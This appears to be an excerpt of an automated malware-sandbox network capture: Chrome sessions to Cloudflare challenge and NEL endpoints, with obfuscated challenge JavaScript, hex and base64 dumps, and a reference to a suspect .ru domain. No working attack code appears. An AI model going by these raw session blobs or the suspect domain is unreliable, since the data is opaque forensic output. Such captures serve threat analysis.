                                                                      Data Ascii: )](I,d[i8(291)](j,1))){G[i8(968)](d[i8(1062)](o,H));break}else I++;return G[i8(816)]('')},'j':function(h,ib){return ib=i5,d[ib(646)](null,h)?'':''==h?null:f.i(h[ib(1252)],32768,function(i,ic){return ic=ib,h[ic(310)](i)})},'i':function(i,j,o,id,s,x,B,C,D,E
                                                                      2025-01-07 08:27:12 UTC1369INData Raw: 37 33 32 29 5d 28 46 2c 4b 29 3b 4c 3d 64 5b 69 64 28 39 39 32 29 5d 28 47 2c 48 29 2c 48 3e 3e 3d 31 2c 48 3d 3d 30 26 26 28 48 3d 6a 2c 47 3d 6f 28 49 2b 2b 29 29 2c 4a 7c 3d 28 30 3c 4c 3f 31 3a 30 29 2a 46 2c 46 3c 3c 3d 31 29 3b 73 5b 42 2b 2b 5d 3d 65 28 4a 29 2c 4d 3d 64 5b 69 64 28 32 39 31 29 5d 28 42 2c 31 29 2c 78 2d 2d 3b 62 72 65 61 6b 3b 63 61 73 65 20 31 3a 66 6f 72 28 4a 3d 30 2c 4b 3d 4d 61 74 68 5b 69 64 28 31 35 37 35 29 5d 28 32 2c 31 36 29 2c 46 3d 31 3b 64 5b 69 64 28 31 31 33 35 29 5d 28 46 2c 4b 29 3b 4c 3d 64 5b 69 64 28 35 34 33 29 5d 28 47 2c 48 29 2c 48 3e 3e 3d 31 2c 48 3d 3d 30 26 26 28 48 3d 6a 2c 47 3d 6f 28 49 2b 2b 29 29 2c 4a 7c 3d 64 5b 69 64 28 31 34 31 33 29 5d 28 64 5b 69 64 28 31 35 38 38 29 5d 28 30 2c 4c 29 3f 31
                                                                      Data Ascii: 732)](F,K);L=d[id(992)](G,H),H>>=1,H==0&&(H=j,G=o(I++)),J|=(0<L?1:0)*F,F<<=1);s[B++]=e(J),M=d[id(291)](B,1),x--;break;case 1:for(J=0,K=Math[id(1575)](2,16),F=1;d[id(1135)](F,K);L=d[id(543)](G,H),H>>=1,H==0&&(H=j,G=o(I++)),J|=d[id(1413)](d[id(1588)](0,L)?1
                                                                      2025-01-07 08:27:12 UTC1369INData Raw: 31 36 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 66 2c 67 2c 68 2c 69 68 2c 69 2c 6a 2c 6b 2c 6c 2c 6d 2c 6e 2c 6f 2c 73 2c 78 2c 42 2c 43 2c 44 2c 45 2c 46 29 7b 69 3d 28 69 68 3d 67 4a 2c 7b 27 49 6e 7a 74 66 27 3a 69 68 28 36 32 38 29 2c 27 6e 4e 6c 6c 42 27 3a 69 68 28 31 32 32 36 29 2c 27 71 74 56 43 76 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 2b 48 7d 2c 27 54 56 52 6a 66 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 2c 49 29 7b 72 65 74 75 72 6e 20 47 28 48 2c 49 29 7d 7d 29 3b 74 72 79 7b 66 6f 72 28 6a 3d 69 68 28 31 35 33 39 29 5b 69 68 28 38 35 33 29 5d 28 27 7c 27 29 2c 6b 3d 30 3b 21 21 5b 5d 3b 29 7b 73 77 69 74 63 68 28 6a 5b 6b 2b 2b 5d 29 7b 63 61 73 65 27 30 27 3a 6e 5b 69 68 28 35 37 31 29 5d 28 69 5b 69 68 28 31 31
                                                                      Data Ascii: 16)]=function(f,g,h,ih,i,j,k,l,m,n,o,s,x,B,C,D,E,F){i=(ih=gJ,{'Inztf':ih(628),'nNllB':ih(1226),'qtVCv':function(G,H){return G+H},'TVRjf':function(G,H,I){return G(H,I)}});try{for(j=ih(1539)[ih(853)]('|'),k=0;!![];){switch(j[k++]){case'0':n[ih(571)](i[ih(11


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      17192.168.2.1649734104.18.95.414436908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2025-01-07 08:27:12 UTC1169OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/66560694:1736234662:g2tTdhX1N4yQAMduBmEPcwG9Jve5D0zcYbutF1fAQHw/8fe2912ef9947ce2/RbQkraW63v_SNEukALAU7BXWI3qRRiLIwjVM5tIrraQ-1736238430-1.1.1.1-Ed8FZ3WJviBCzb2N6uYl04L6Z4cizB5OXCLfJ8bmEjw8ybsWLhdpWyjuoDzkj_mq HTTP/1.1
                                                                      Host: challenges.cloudflare.com
                                                                      Connection: keep-alive
                                                                      Content-Length: 3149
                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                      Content-type: application/x-www-form-urlencoded
                                                                      CF-Chl-RetryAttempt: 0
                                                                      sec-ch-ua-mobile: ?0
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                      CF-Challenge: RbQkraW63v_SNEukALAU7BXWI3qRRiLIwjVM5tIrraQ-1736238430-1.1.1.1-Ed8FZ3WJviBCzb2N6uYl04L6Z4cizB5OXCLfJ8bmEjw8ybsWLhdpWyjuoDzkj_mq
                                                                      sec-ch-ua-platform: "Windows"
                                                                      Accept: */*
                                                                      Origin: https://challenges.cloudflare.com
                                                                      Sec-Fetch-Site: same-origin
                                                                      Sec-Fetch-Mode: cors
                                                                      Sec-Fetch-Dest: empty
                                                                      Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/mjn7o/0x4AAAAAAA2OtUsOMReD_Yux/auto/fbE/normal/auto/
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      2025-01-07 08:27:12 UTC3149OUTData Raw: 76 5f 38 66 65 32 39 31 32 65 66 39 39 34 37 63 65 32 3d 61 6a 57 56 67 56 31 56 51 56 49 56 47 55 34 39 55 34 54 56 55 38 2d 32 4c 36 55 6e 34 4c 30 50 34 46 54 34 53 72 4b 53 39 65 4c 34 2d 38 4c 32 52 4b 65 31 34 54 34 57 38 55 62 53 73 34 25 32 62 4b 34 32 52 4f 62 56 6e 52 34 76 56 55 52 62 55 79 37 77 53 62 34 41 56 37 37 59 34 71 4b 34 51 71 34 57 31 45 34 4d 77 72 55 62 4e 72 24 6c 41 49 49 73 34 55 6a 53 4a 62 4b 55 70 61 71 61 75 46 6d 63 34 68 72 72 53 51 46 24 72 72 55 45 45 55 38 5a 52 33 33 72 6a 2d 38 34 69 78 34 34 78 61 33 56 53 71 44 70 54 2b 71 6b 6e 34 2d 52 34 37 4b 72 59 50 37 2b 34 2d 4b 6a 51 4f 4b 34 65 34 55 2b 34 62 4b 53 48 34 55 37 6f 34 6e 37 64 46 44 70 45 56 6e 62 72 7a 37 2b 30 65 2d 56 76 4d 72 51 31 56 37 24 34 78 47 34
                                                                      Data Ascii: v_8fe2912ef9947ce2=ajWVgV1VQVIVGU49U4TVU8-2L6Un4L0P4FT4SrKS9eL4-8L2RKe14T4W8UbSs4%2bK42RObVnR4vVURbUy7wSb4AV77Y4qK4Qq4W1E4MwrUbNr$lAIIs4UjSJbKUpaqauFmc4hrrSQF$rrUEEU8ZR33rj-84ix44xa3VSqDpT+qkn4-R47KrYP7+4-KjQOK4e4U+4bKSH4U7o4n7dFDpEVnbrz7+0e-VvMrQ1V7$4xG4
                                                                      2025-01-07 08:27:12 UTC759INHTTP/1.1 200 OK
                                                                      Date: Tue, 07 Jan 2025 08:27:12 GMT
                                                                      Content-Type: text/plain; charset=UTF-8
                                                                      Content-Length: 152960
                                                                      Connection: close
                                                                      cf-chl-gen: JFokazXd7xqh8UiuRq66xaDfw5ACtzOWDMTj2wMriHdwP7qypgRKTTY9VI7GsUeqPeI1RgyWahqaZTQ97B+85ALug8p7o94suH7eN3V9n2HjkKYgcSXDbIfeXkEgv1u1KxsV1FwbDHXvN1S0HsbMRu+XFPapMnbUcDAXaYgrSE+epvIgnfmLOGVt3sGq7NWX17PzTJgxRztekFiEf5MpVqfuyvLd1P9zz5pTG6JLCM6fgL30zP7copDuXQ+GeRJq4rnz88SV/bLZv6X7e6pYrAw3gGzxMQ9WdoJiJRQJs1BC7phEYSeQqdRzJNkBKV6LcrgGvwII22eTeHONInQ251CKzkySJ4xF2+baBwZSSVGjNbF3SrlGARtgqpOHGReNdZ5SwsxSjPVj9tmfWrDm8HzS95DgJpcE/Kg9dwotw39VB47n3fS4edPLsmRqaxHKnfPnpahuNi/47LD8ry7WvrZNL52L/QADfqj8awz2div3ZXl6CBAJMfrUTw==$L85enMXLL5dMaBUC
                                                                      Server: cloudflare
                                                                      CF-RAY: 8fe29138ff87433a-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      2025-01-07 08:27:12 UTC610INData Raw: 66 37 2b 68 6a 37 79 52 68 6f 65 68 76 4c 65 35 70 59 79 77 71 35 75 49 79 49 75 4c 30 36 75 72 77 39 54 46 6c 70 57 5a 6b 62 62 52 6d 72 79 2b 6f 70 79 30 32 4f 62 72 76 38 6e 46 75 73 44 45 30 75 7a 54 7a 65 47 79 39 65 4c 50 78 73 2b 79 39 4c 75 2b 37 4c 4f 38 33 4f 54 74 31 51 50 41 32 2f 67 45 39 65 41 4e 35 4f 76 75 38 65 54 7a 41 41 6f 44 41 2f 58 54 44 52 34 4d 35 68 59 62 46 65 45 68 2f 42 6e 6c 4a 66 59 71 49 68 6e 37 4b 79 6b 41 48 53 4c 6f 43 42 4d 72 49 67 59 6a 4c 54 4c 32 44 42 48 34 39 67 38 54 46 2f 6b 51 52 52 72 39 46 45 6c 46 42 53 67 47 48 79 6f 63 43 67 38 79 4d 55 67 7a 4c 55 55 33 4e 30 6f 76 48 56 4a 67 53 6a 46 51 55 30 46 46 52 47 64 49 53 46 34 6c 4f 6b 35 4e 51 57 63 38 58 44 39 70 63 30 70 52 5a 47 34 36 56 47 35 33 63 47 70
                                                                      Data Ascii: f7+hj7yRhoehvLe5pYywq5uIyIuL06urw9TFlpWZkbbRmry+opy02Obrv8nFusDE0uzTzeGy9eLPxs+y9Lu+7LO83OTt1QPA2/gE9eAN5Ovu8eTzAAoDA/XTDR4M5hYbFeEh/BnlJfYqIhn7KykAHSLoCBMrIgYjLTL2DBH49g8TF/kQRRr9FElFBSgGHyocCg8yMUgzLUU3N0ovHVJgSjFQU0FFRGdISF4lOk5NQWc8XD9pc0pRZG46VG53cGp
                                                                      2025-01-07 08:27:12 UTC1369INData Raw: 71 43 53 56 70 6b 66 59 4b 52 66 49 35 4e 64 32 4a 75 54 48 64 32 56 6e 52 73 62 6f 39 67 6e 34 47 6d 5a 57 65 56 5a 48 31 6c 67 35 74 33 64 36 74 73 69 35 79 54 6f 48 36 70 74 35 69 6d 62 5a 4f 6f 76 33 79 73 65 71 4b 5a 66 58 79 68 78 49 58 42 74 59 76 4a 72 4a 75 63 6f 71 37 46 78 34 2f 56 6b 38 71 70 71 62 43 6d 75 64 61 71 7a 62 47 72 6e 4a 2f 42 6f 62 79 2b 31 38 4c 4b 6f 62 54 63 34 39 44 72 77 72 7a 7a 73 72 32 32 38 64 54 42 38 64 72 30 36 64 7a 32 38 74 37 52 33 2f 66 56 37 77 6e 67 35 67 72 70 35 65 59 44 38 4f 7a 63 33 50 49 42 44 51 30 58 47 64 51 4a 37 66 59 5a 45 41 30 4f 39 2f 49 4e 49 78 4d 47 38 43 54 79 39 52 77 66 4b 2f 30 4e 49 78 6f 4f 35 53 30 6f 38 43 38 32 45 79 7a 34 4e 69 67 30 4b 7a 45 36 52 43 49 33 4a 43 5a 48 52 52 77 57 54
                                                                      Data Ascii: qCSVpkfYKRfI5Nd2JuTHd2VnRsbo9gn4GmZWeVZH1lg5t3d6tsi5yToH6pt5imbZOov3yseqKZfXyhxIXBtYvJrJucoq7Fx4/Vk8qpqbCmudaqzbGrnJ/Boby+18LKobTc49Drwrzzsr228dTB8dr06dz28t7R3/fV7wng5grp5eYD8Ozc3PIBDQ0XGdQJ7fYZEA0O9/INIxMG8CTy9RwfK/0NIxoO5S0o8C82Eyz4Nig0KzE6RCI3JCZHRRwWT
                                                                      2025-01-07 08:27:12 UTC1369INData Raw: 6c 5a 5a 42 55 59 34 4e 34 64 6d 4e 5a 64 34 78 6f 6c 6d 42 71 59 58 2b 45 6d 4a 32 6b 66 71 4b 41 70 4a 70 6e 70 34 75 49 6d 72 53 6a 6f 49 53 58 67 49 36 4d 6d 62 71 70 6e 48 2b 76 75 5a 43 77 72 70 2b 7a 6a 35 57 56 76 4b 53 4d 72 71 37 42 72 5a 33 4c 76 4d 6d 6e 71 62 4b 31 6b 71 65 7a 31 63 58 5a 6d 4d 72 56 30 4a 2f 64 33 64 79 66 77 63 61 32 31 39 2b 71 79 4d 66 4f 76 38 6a 4b 35 4d 62 4b 78 4e 66 61 74 4f 58 7a 2b 2f 71 32 36 2b 2f 34 7a 50 33 30 33 77 48 30 77 39 50 72 36 41 62 74 42 4d 77 51 42 41 33 78 37 75 59 42 35 52 4d 57 39 67 55 48 36 68 50 31 38 41 4c 66 47 66 49 45 46 52 6a 33 39 79 66 39 36 41 49 69 41 53 34 4d 37 68 51 68 47 50 55 73 42 50 49 34 45 66 73 79 49 51 34 32 45 68 45 33 50 78 6f 70 4e 6a 77 58 44 43 55 4a 4b 52 6b 6e 44 53
                                                                      Data Ascii: lZZBUY4N4dmNZd4xolmBqYX+EmJ2kfqKApJpnp4uImrSjoISXgI6MmbqpnH+vuZCwrp+zj5WVvKSMrq7BrZ3LvMmnqbK1kqez1cXZmMrV0J/d3dyfwca219+qyMfOv8jK5MbKxNfatOXz+/q26+/4zP303wH0w9Pr6AbtBMwQBA3x7uYB5RMW9gUH6hP18ALfGfIEFRj39yf96AIiAS4M7hQhGPUsBPI4EfsyIQ42EhE3PxopNjwXDCUJKRknDS
                                                                      2025-01-07 08:27:12 UTC1369INData Raw: 59 35 4a 6e 58 5a 46 6e 6e 56 71 59 65 6e 69 53 6d 33 39 6c 57 34 71 56 69 48 61 62 71 61 78 77 68 71 36 31 6b 70 42 7a 70 71 71 4c 64 4b 6d 58 64 36 65 32 6b 6f 2b 55 6e 34 4b 59 6b 73 4f 66 79 59 71 35 66 36 4f 70 68 71 2f 4b 6e 73 79 30 73 39 66 59 32 4d 79 37 6c 73 2b 30 72 72 6d 5a 75 73 53 63 34 74 4b 2b 34 65 71 38 33 61 7a 41 35 73 6e 52 7a 73 4f 77 35 75 50 43 30 4d 48 30 30 4c 4c 6d 2b 2b 33 34 30 64 7a 72 38 4d 33 61 33 2b 4c 51 32 77 6e 68 2f 4e 34 4f 35 4d 77 44 2f 73 2f 4b 2f 66 41 45 44 67 30 4c 39 64 76 71 36 4e 72 77 38 2b 77 45 38 75 4c 79 42 67 55 54 48 67 77 46 36 43 6e 36 2f 43 41 44 2f 50 4d 30 4d 42 55 48 42 43 34 37 37 67 38 71 49 42 59 4c 50 69 55 31 4e 54 49 61 47 55 51 35 54 54 30 63 48 41 73 67 4a 6c 4a 50 52 45 6f 72 53 7a 63
                                                                      Data Ascii: Y5JnXZFnnVqYeniSm39lW4qViHabqaxwhq61kpBzpqqLdKmXd6e2ko+Un4KYksOfyYq5f6Ophq/Knsy0s9fY2My7ls+0rrmZusSc4tK+4eq83azA5snRzsOw5uPC0MH00LLm++340dzr8M3a3+LQ2wnh/N4O5MwD/s/K/fAEDg0L9dvq6Nrw8+wE8uLyBgUTHgwF6Cn6/CAD/PM0MBUHBC477g8qIBYLPiU1NTIaGUQ5TT0cHAsgJlJPREorSzc
                                                                      2025-01-07 08:27:12 UTC1369INData Raw: 71 46 65 65 4a 57 6b 6a 33 52 79 57 34 5a 2f 5a 4b 79 45 69 49 53 47 67 49 69 67 67 37 5a 70 68 61 53 46 6b 36 79 35 6e 59 65 59 6c 4b 50 43 6d 71 61 35 78 70 47 49 78 4b 54 4d 6f 63 47 75 79 71 54 51 76 35 43 4e 6c 70 2b 30 70 71 53 73 78 73 61 65 7a 63 71 37 32 75 44 6c 34 35 2f 66 6e 72 36 31 31 4d 58 63 36 64 43 37 33 65 58 4f 77 65 50 4c 39 73 37 4c 78 2b 54 48 38 76 7a 74 30 50 4c 4d 41 65 2b 39 78 64 44 46 2b 4f 76 61 31 38 33 41 31 39 30 45 34 65 6b 49 42 65 6a 57 44 63 2f 78 36 64 50 55 47 76 54 39 43 69 54 39 42 52 51 66 43 53 45 46 2b 65 54 2b 48 68 6f 76 42 75 6b 6f 41 69 7a 39 39 4f 6e 79 42 52 55 6d 4e 42 45 5a 4e 43 34 62 2f 44 49 6d 4f 54 45 78 4f 78 77 37 2f 53 6b 35 4b 41 63 49 54 30 78 51 46 45 5a 47 49 69 63 6d 55 45 6c 50 47 54 4e 41
                                                                      Data Ascii: qFeeJWkj3RyW4Z/ZKyEiISGgIigg7ZphaSFk6y5nYeYlKPCmqa5xpGIxKTMocGuyqTQv5CNlp+0pqSsxsaezcq72uDl45/fnr611MXc6dC73eXOwePL9s7Lx+TH8vzt0PLMAe+9xdDF+Ova183A190E4ekIBejWDc/x6dPUGvT9CiT9BRQfCSEF+eT+HhovBukoAiz99OnyBRUmNBEZNC4b/DImOTExOxw7/Sk5KAcIT0xQFEZGIicmUElPGTNA
                                                                      2025-01-07 08:27:12 UTC1369INData Raw: 69 63 70 49 71 56 6f 4b 79 6e 59 5a 31 6a 66 71 6c 39 62 4b 2b 4c 71 48 43 73 69 4a 69 38 6b 5a 75 78 76 4a 65 51 6f 4a 61 5a 6f 4c 72 49 6e 61 4f 2b 79 4a 69 63 72 4c 79 67 72 73 61 7a 70 59 2f 4d 6b 37 61 4e 6c 4c 48 4f 6d 4a 6d 36 33 35 7a 57 76 36 2b 65 31 38 65 38 33 4c 7a 6b 35 63 62 6c 78 63 4c 6a 37 4f 44 41 78 66 65 35 7a 39 57 32 74 39 48 30 33 41 4b 2f 33 76 43 2b 32 2f 6a 39 2b 64 2f 6a 39 77 45 4f 79 39 77 4f 44 67 7a 51 46 39 34 52 31 65 73 59 45 74 6b 61 43 52 6a 64 38 75 6f 4d 45 76 4c 76 4a 43 50 66 42 53 73 6d 43 51 4d 77 4b 79 66 36 4c 2f 4d 76 44 6a 67 6b 42 44 77 36 45 43 38 52 50 67 41 7a 48 41 45 31 49 69 55 64 4d 30 68 4a 51 68 63 4b 4b 55 4d 4f 44 41 77 77 4c 67 67 7a 53 6c 59 32 4e 31 49 78 55 6a 70 55 48 54 59 32 4f 45 5a 63 55
                                                                      Data Ascii: icpIqVoKynYZ1jfql9bK+LqHCsiJi8kZuxvJeQoJaZoLrInaO+yJicrLygrsazpY/Mk7aNlLHOmJm635zWv6+e18e83Lzk5cblxcLj7ODAxfe5z9W2t9H03AK/3vC+2/j9+d/j9wEOy9wODgzQF94R1esYEtkaCRjd8uoMEvLvJCPfBSsmCQMwKyf6L/MvDjgkBDw6EC8RPgAzHAE1IiUdM0hJQhcKKUMODAwwLggzSlY2N1IxUjpUHTY2OEZcU
                                                                      2025-01-07 08:27:12 UTC1369INData Raw: 49 71 47 68 2b 69 59 6d 41 70 35 36 53 64 4b 4b 50 63 61 53 61 69 71 65 30 66 70 75 56 6e 35 75 55 6c 6f 62 47 78 6f 54 4b 6d 36 58 4d 77 63 6d 51 78 73 58 51 71 4d 69 67 78 61 2f 53 75 4d 69 73 74 70 69 79 73 4c 6a 6b 30 35 2b 38 36 62 36 34 75 4d 6a 74 7a 38 44 6a 30 73 72 72 38 74 2f 4a 74 73 7a 6e 32 74 7a 39 2f 65 37 6e 33 66 43 35 30 63 44 53 7a 75 6a 51 2f 50 50 30 37 4d 77 48 36 4d 76 64 45 52 54 6e 44 2b 67 51 46 39 49 49 32 42 59 4d 44 42 72 78 44 75 4c 64 37 52 6b 67 2f 76 6b 4c 4a 51 6e 37 35 50 34 77 44 52 38 45 4b 2b 76 77 38 41 34 45 4d 51 51 55 4d 76 58 38 43 67 73 32 41 30 49 59 42 42 68 48 4d 77 6b 57 48 51 6f 4a 4f 69 77 67 54 68 41 79 53 30 38 6f 52 7a 5a 53 50 42 4e 65 56 56 59 67 47 6b 49 61 57 6d 56 64 49 53 52 71 53 32 4d 72 4b 57
                                                                      Data Ascii: IqGh+iYmAp56SdKKPcaSaiqe0fpuVn5uUlobGxoTKm6XMwcmQxsXQqMigxa/SuMistpiysLjk05+86b64uMjtz8Dj0srr8t/Jtszn2tz9/e7n3fC50cDSzujQ/PP07MwH6MvdERTnD+gQF9II2BYMDBrxDuLd7Rkg/vkLJQn75P4wDR8EK+vw8A4EMQQUMvX8Cgs2A0IYBBhHMwkWHQoJOiwgThAyS08oRzZSPBNeVVYgGkIaWmVdISRqS2MrKW
                                                                      2025-01-07 08:27:12 UTC1369INData Raw: 66 36 36 30 6c 49 39 7a 73 4a 65 57 6d 4b 31 38 73 36 71 4c 6f 58 32 32 70 37 33 45 71 61 6d 2f 75 4d 69 2f 69 71 4b 78 76 4d 4b 53 78 49 2f 43 31 70 43 71 75 72 57 57 31 4d 6a 4e 76 74 2b 62 77 72 48 6b 32 75 50 63 37 4e 58 61 6f 4b 36 39 78 36 6a 43 7a 65 50 52 77 37 44 4a 38 38 33 46 30 65 69 2b 75 4d 33 5a 75 37 7a 6d 77 4f 4c 6e 2b 73 67 46 31 38 6b 4f 35 73 37 61 42 4f 67 4e 2f 67 34 54 38 67 72 74 36 2f 44 59 44 67 38 4e 36 69 54 33 44 67 59 49 47 66 30 61 46 4e 30 73 33 78 67 6e 2f 65 6a 70 45 50 45 65 41 69 41 4e 4e 52 51 78 42 68 62 37 4b 30 41 39 44 54 49 58 4e 77 38 51 42 54 63 6a 44 42 70 4f 48 43 63 4c 4a 30 59 69 4b 43 45 67 49 68 41 5a 52 45 55 74 4e 7a 34 78 45 31 77 73 47 79 35 56 4e 46 49 62 56 32 68 72 51 57 38 36 4c 69 68 48 53 46 77
                                                                      Data Ascii: f660lI9zsJeWmK18s6qLoX22p73Eqam/uMi/iqKxvMKSxI/C1pCqurWW1MjNvt+bwrHk2uPc7NXaoK69x6jCzePRw7DJ883F0ei+uM3Zu7zmwOLn+sgF18kO5s7aBOgN/g4T8grt6/DYDg8N6iT3DgYIGf0aFN0s3xgn/ejpEPEeAiANNRQxBhb7K0A9DTIXNw8QBTcjDBpOHCcLJ0YiKCEgIhAZREUtNz4xE1wsGy5VNFIbV2hrQW86LihHSFw
                                                                      2025-01-07 08:27:12 UTC1369INData Raw: 34 61 58 75 70 69 6f 6f 4c 4c 44 76 34 32 54 6f 37 6d 4a 70 4c 69 63 79 73 57 47 70 62 33 47 77 73 53 4e 6a 63 4f 51 79 71 66 54 7a 5a 6d 79 77 4c 79 72 75 63 2f 6a 76 37 7a 57 31 38 57 36 70 71 61 6a 77 37 7a 74 79 64 2f 68 76 71 65 2b 79 76 6e 48 77 38 66 72 7a 2f 58 48 2f 65 37 38 32 39 33 44 32 50 50 53 31 74 2f 66 79 4d 50 4a 43 75 49 4c 45 75 72 64 79 2b 48 6a 41 51 6a 6a 48 52 4c 59 2b 78 4c 77 39 66 72 79 41 66 63 62 46 2f 4c 68 4c 41 58 70 41 67 4d 6b 4b 4f 34 65 4a 67 4d 7a 38 50 63 61 4f 78 6b 34 4e 7a 63 2b 4f 7a 72 33 44 79 49 6b 4c 30 63 63 47 54 30 4c 4e 41 67 34 54 54 73 68 49 6a 51 64 4b 30 45 56 52 44 4d 6a 4b 7a 46 61 52 6b 6f 72 4b 56 78 5a 4a 46 42 65 50 54 38 32 52 6d 42 5a 4c 47 74 68 61 32 70 61 51 47 68 49 53 6e 52 58 56 46 49 34
                                                                      Data Ascii: 4aXupiooLLDv42To7mJpLicysWGpb3GwsSNjcOQyqfTzZmywLyruc/jv7zW18W6pqajw7ztyd/hvqe+yvnHw8frz/XH/e78293D2PPS1t/fyMPJCuILEurdy+HjAQjjHRLY+xLw9fryAfcbF/LhLAXpAgMkKO4eJgMz8PcaOxk4Nzc+Ozr3DyIkL0ccGT0LNAg4TTshIjQdK0EVRDMjKzFaRkorKVxZJFBePT82RmBZLGtha2paQGhISnRXVFI4


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      18192.168.2.164973335.190.80.14436908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2025-01-07 08:27:12 UTC526OUTOPTIONS /report/v4?s=EVcS3nk4wHQQoiLOlRJDZIiyM6ZbYW3yldql5xz1jAJAXpBIeB8fOK1TlKEwiH37qS4XSK18Je3yX1Q3L3CjFy1OBdvJoip4RgWGiKqBxv8MlLDmopA0expdiU3Xzw%3D%3D HTTP/1.1
                                                                      Host: a.nel.cloudflare.com
                                                                      Connection: keep-alive
                                                                      Origin: https://y7.novenef.ru
                                                                      Access-Control-Request-Method: POST
                                                                      Access-Control-Request-Headers: content-type
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      2025-01-07 08:27:12 UTC336INHTTP/1.1 200 OK
                                                                      Content-Length: 0
                                                                      access-control-max-age: 86400
                                                                      access-control-allow-methods: OPTIONS, POST
                                                                      access-control-allow-origin: *
                                                                      access-control-allow-headers: content-type, content-length
                                                                      date: Tue, 07 Jan 2025 08:27:12 GMT
                                                                      Via: 1.1 google
                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                      Connection: close


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      19192.168.2.164973535.190.80.14436908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2025-01-07 08:27:12 UTC470OUTPOST /report/v4?s=EVcS3nk4wHQQoiLOlRJDZIiyM6ZbYW3yldql5xz1jAJAXpBIeB8fOK1TlKEwiH37qS4XSK18Je3yX1Q3L3CjFy1OBdvJoip4RgWGiKqBxv8MlLDmopA0expdiU3Xzw%3D%3D HTTP/1.1
                                                                      Host: a.nel.cloudflare.com
                                                                      Connection: keep-alive
                                                                      Content-Length: 419
                                                                      Content-Type: application/reports+json
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      2025-01-07 08:27:12 UTC419OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 31 30 38 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 79 37 2e 6e 6f 76 65 6e 65 66 2e 72 75 2f 4c 6a 39 65 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 32 31 2e 36 34 2e 31 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a
                                                                      Data Ascii: [{"age":0,"body":{"elapsed_time":108,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://y7.novenef.ru/Lj9e/","sampling_fraction":1.0,"server_ip":"104.21.64.1","status_code":404,"type":"http.error"},"type":"network-error","url":
                                                                      2025-01-07 08:27:12 UTC168INHTTP/1.1 200 OK
                                                                      Content-Length: 0
                                                                      date: Tue, 07 Jan 2025 08:27:12 GMT
                                                                      Via: 1.1 google
                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                      Connection: close


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      20192.168.2.1649736104.18.94.414436908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2025-01-07 08:27:12 UTC597OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/66560694:1736234662:g2tTdhX1N4yQAMduBmEPcwG9Jve5D0zcYbutF1fAQHw/8fe2912ef9947ce2/RbQkraW63v_SNEukALAU7BXWI3qRRiLIwjVM5tIrraQ-1736238430-1.1.1.1-Ed8FZ3WJviBCzb2N6uYl04L6Z4cizB5OXCLfJ8bmEjw8ybsWLhdpWyjuoDzkj_mq HTTP/1.1
                                                                      Host: challenges.cloudflare.com
                                                                      Connection: keep-alive
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                      Accept: */*
                                                                      Sec-Fetch-Site: none
                                                                      Sec-Fetch-Mode: cors
                                                                      Sec-Fetch-Dest: empty
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      2025-01-07 08:27:13 UTC379INHTTP/1.1 404 Not Found
                                                                      Date: Tue, 07 Jan 2025 08:27:13 GMT
                                                                      Content-Type: application/json
                                                                      Content-Length: 7
                                                                      Connection: close
                                                                      cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
